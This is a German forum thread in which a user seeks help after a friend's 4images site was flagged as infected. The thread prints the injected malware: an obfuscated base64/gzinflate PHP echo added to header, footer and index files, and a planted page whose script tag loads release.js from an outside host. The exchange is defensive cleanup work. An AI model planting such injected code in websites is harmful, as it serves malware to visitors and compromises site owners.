Seite gehackt ? HTML:Script-inf (Engine B)

[musicsurfer]

Hallo zusammen,
ein Freund von mir nutzt das 4images für seine Seite.
Und dieses schon 2-3 Jahre.
Nun bekommt er plötzlich an seinem PC mit GData folgende Meldung:

Website gesperrt!
G Data InternetSecurity 2012 hat den Zugriff auf diese Webseite verweigert.
Die Seite enthält infizierten Code: HTML:Script-inf (Engine B).

Von anderen PCs (es wurden 4 getestet) ist ein Zugriff auf die Seite möglich.
Kann es sein das die Seite gehackt wurde udn wie kann er das feststellen ?
Bin für jede Hilfe dankbar.

Gruss
Musicsurfer

[Rembrandt]

Wie sollen wir dir Helfen wenn du nicht einmal einmal einen Link zu dieser Webseite einstellst.

mfg Andi

[musicsurfer]

Hi rembrandt,
da es sich nicht um meine Seite handelt, habe ich die URL nur per PN weitergegeben.
Sorry, das hätte ich dabeischreiben sollen.
Ich habe in der Zwischezit die gesicherten PHP-Dateien wieder auf den Server gespielt und nun geht es wieder.
In fast allen Ordnern waren HEADER und FOOTER, sowie INDEX-Dateien verändert

Gruss
Musicsurfer

[Rembrandt]

dein Bekannter sollte schleunigst sein ftp Passwort ändern, b.z.w. seinen PC auf Trojaner e.t.c. untersuchen,
 sonst kann es passieren das trotz geänderten Passwort die Dateien am FTP wieder geändert werden.

mfg Andi

[musicsurfer]

Hallo,

sein (und mein PC) wurde mit Malwarebytes getestet und ohne Fehler.

Bei dem Server waren die Footer, Header und indexes um folgendes ergänzt:

Code: [Select]

#b58b6f#
echo(gzinflate(base64_decode("JcvBDYAgDADAVUgHoH8D7NJgVVCEtNXo9j78XnJBs5Rhzt7BEYwfw0o3/QpOJUfYzMaE2GWls+Sl97mR7Gzqc2+eLhQ+mJR9VUgB/5s+")));
#/b58b6f#
Ebenso befanden sich in einigen Ordnern index-Files, die dort nicht hingehören.
Eines habe ich mir mal angesehen:

Code: [Select]

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD><!--b58b6f--><script type="text/javascript" src="http://organicfoodmarkets.com.au/release.js"></script><!--/b58b6f-->

<TITLE></TITLE>
<META http-equiv=Refresh Content="0; Url=../../">
</HEAD>
</HTML>
FTP-Passwörter wurden geändert.

Gruss
Musicsurfer

[Rembrandt]

ja das kenne ich, die veränderten Files wurden/werden immer mit dem FTP programm des Users hochgeladen.
wenn es wieder passiert wäre es besser das FTP programm zu wechseln.

mfg Andi

[musicsurfer]

Hi Rembarndt,
heißt das das jemand anderes die Files hochgeladen hat oder ich als ich das FTP-Programm gestartet habe ?

GRuss

[Rembrandt]

das ftp programm ist verseucht, darum nutzt es dir nichts wenn du das FTP Server Passwort änderst.

[musicsurfer]

Also ich habe mein Filezilla jetzt gegen SmartFTP eingetauscht.
Oder hast du eine Empfehlung für mich, welches FTP-Programm man nutzen kann ?

Das Änderungsdatum der Files ist komischerweise zu der Zeit, wenn der Server das tägliche Backup macht ....
Allerdings war die Änderung am 23.3., und danach waren ja noch 2-3 tägliche Backups.
Egal, ich habe mein FTP-Programm jetzt getauscht und mein System gescannt.

Gruss
Musicsurfer

[Rembrandt]

ein frage noch, hast du "WordPress" auch oben?
Zur Zeit scheint der Trojaner ganz aktuell zu sein, wenn du in google als suchbegriff den webseiten link  eingibst, sieht du welche seite alle infiziert sind.

[musicsurfer]

Hi Rembrandt,
WordpRess habe ich nicht auf dem Server.
Und wenn ich die URL bei Google eingebe erscheinen jetzt zumindest keine ungewöhnlichen Suchergebnisse.

Gruss
Musicsurfer

[Rembrandt]

ich wollte den link nicht rein kopieren, das "h**p://organicfoodmarkets.com.au/release.js" in das google suchfeld, ohne sterne.
Dann siehst du die betroffenen Webseiten.

mfg Andi

[musicsurfer]

Wow
Ich bin beeindruckt 

Kannst du mir denn ein FTP-Progrmam empfehlen, welches die Passswörter nicht speichert ?
Von Filezilla bin ich auf jeden Fall weg und bei FlashFTP bekomme ich die gespeicherten Passwörter nicht weg.
Welches würdest du denn empfehlen ?

Gruss
Musicsurfer

[Rembrandt]

weiß ich leider jetzt keines, ich selber verwende auch flashfpx.

mfg Andi